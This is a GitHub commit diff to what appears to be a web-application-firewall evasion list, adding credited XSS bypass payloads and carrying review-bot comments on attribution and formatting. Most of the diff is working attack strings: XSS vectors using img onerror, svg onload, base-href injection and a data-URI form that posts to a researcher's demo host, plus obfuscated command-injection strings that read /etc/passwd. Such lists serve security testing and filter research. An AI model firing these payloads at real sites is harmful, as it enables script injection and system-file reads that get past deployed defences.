Added more xss bypasses from @renwax23 @brutelogic

Infected Drake 2019-07-15 15:27:12 +05:30 committed by GitHub
parent 84280f3751
commit 2a8e5b77d5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -2963,6 +2963,7 @@ http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3csc
<svg onload=prompt%26%230000000040document.domain)> <svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)> <svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
1'"><img/src/onerror=.1|alert``>
``` ```
- XSS Bypass by [@RakeshMane10](https://twitter.com/rakeshmane10) - XSS Bypass by [@RakeshMane10](https://twitter.com/rakeshmane10)
``` ```
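Review bot: The added `<img/src/onerror=` line is appended inside the existing fenced block instead of being listed as its own entry, so it has no author credit or source link and reads as part of the entry above it. The other additions in this commit each get a `- [XSS Bypass](...) by [@handle]` line; give this one the same, or state in the commit message which of the two credited authors it came from.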
@ -2981,6 +2982,14 @@ xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
``` ```
javascript:{alert`0`} javascript:{alert`0`}
``` ```
- [XSS Bypass](https://twitter.com/brutelogic/status/1147118371965755393) by [@Brute Logic](https://twitter.com/brutelogic)
```
<base href=//knoxss.me?
```
- [XSS Bypass](https://twitter.com/RenwaX23/status/1147130091031449601) by [@RenwaX23](https://twitter.com/RenwaX23) (Chrome only)
```
<j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x
```
- [RCE Payload Detection Bypass](https://www.secjuice.com/web-application-firewall-waf-evasion/) by [@theMiddle](https://twitter.com/Menin_TheMiddle) - [RCE Payload Detection Bypass](https://www.secjuice.com/web-application-firewall-waf-evasion/) by [@theMiddle](https://twitter.com/Menin_TheMiddle)
``` ```
cat$u+/etc$u/passwd$u cat$u+/etc$u/passwd$u
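Review bot: The link text `[@Brute Logic]` on the first added entry is not a handle. The URL it points to is twitter.com/brutelogic, and the neighbouring entries use the real handle form (`@RakeshMane10`, `@RenwaX23`), so write it as `@brutelogic`. The second entry is tagged "(Chrome only)" but the `<base href=` entry has no browser or tested-version note; adding one would tell readers who maintain filter rules what scope the sample was observed in.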
@ -2989,7 +2998,7 @@ cat$u+/etc$u/passwd$u
``` ```
### Comodo ### Comodo
- XSS Bypass by [0xInfection](https://twitter.com/0xinfection) - XSS Bypass by [@0xInfection](https://twitter.com/0xinfection)
``` ```
<input/oninput='new Function`confir\u006d\`0\``'> <input/oninput='new Function`confir\u006d\`0\``'>
<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme <p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
@ -3311,6 +3320,12 @@ c\\a\\t+/et\\c/pas\\swd
``` ```
"><input/onauxclick="[1].map(prompt)"> "><input/onauxclick="[1].map(prompt)">
``` ```
- [XSS Bypass](https://twitter.com/brutelogic/status/1148610104738099201) by [@Brute Logic](https://twitter.com/brutelogic)
```
data:text/html,<form action=https://brutelogic.com.br/xss-cp.php method=post>
<input type=hidden name=a value="<img/src=//knoxss.me/yt.jpg onpointerenter=alert`1`>">
<input type=submit></form>
```
### URLScan ### URLScan
- [Directory Traversal](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Beyond%20SQLi%20-%20Obfuscate%20and%20Bypass%20WAFs.txt#L557) by [@ZeQ3uL](http://www.exploit-db.com/author/?a=1275) (<= v3.1) (Only on ASP.NET) - [Directory Traversal](https://github.com/0xInfection/Awesome-WAF/blob/master/papers/Beyond%20SQLi%20-%20Obfuscate%20and%20Bypass%20WAFs.txt#L557) by [@ZeQ3uL](http://www.exploit-db.com/author/?a=1275) (<= v3.1) (Only on ASP.NET)
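Review bot: The added `data:text/html` entry hardcodes live third-party hosts, `brutelogic.com.br/xss-cp.php` as the form action and `knoxss.me/yt.jpg` as the image source, so the sample depends on those pages staying up and contacts them whenever it is rendered. Say in the entry that these are the researcher's own demo endpoints, or swap in a placeholder host. The entry also repeats the `[@Brute Logic]` link text, which does not match the handle in its URL, and has no browser note like the "(Chrome only)" tag used earlier in this commit.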
@ -3349,7 +3364,7 @@ http://host.com/test.asp?file=.%./bla.txt
``` ```
### Wordfence ### Wordfence
- XSS Bypass by [@brutelogic](https://twitter.com/brutelogic) - XSS Bypass by [@brute Logic](https://twitter.com/brutelogic)
``` ```
<a href=javas&#99;ript:alert(1)> <a href=javas&#99;ript:alert(1)>
``` ```
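Review bot: The attribution change on the Wordfence entry replaces a handle that matches its URL with one that does not: `[@brutelogic]` becomes `[@brute Logic]`, which contains a space and also differs in case from the `[@Brute Logic]` used in the entries added elsewhere in this commit. Revert this line, or pick one spelling and apply it in all three places.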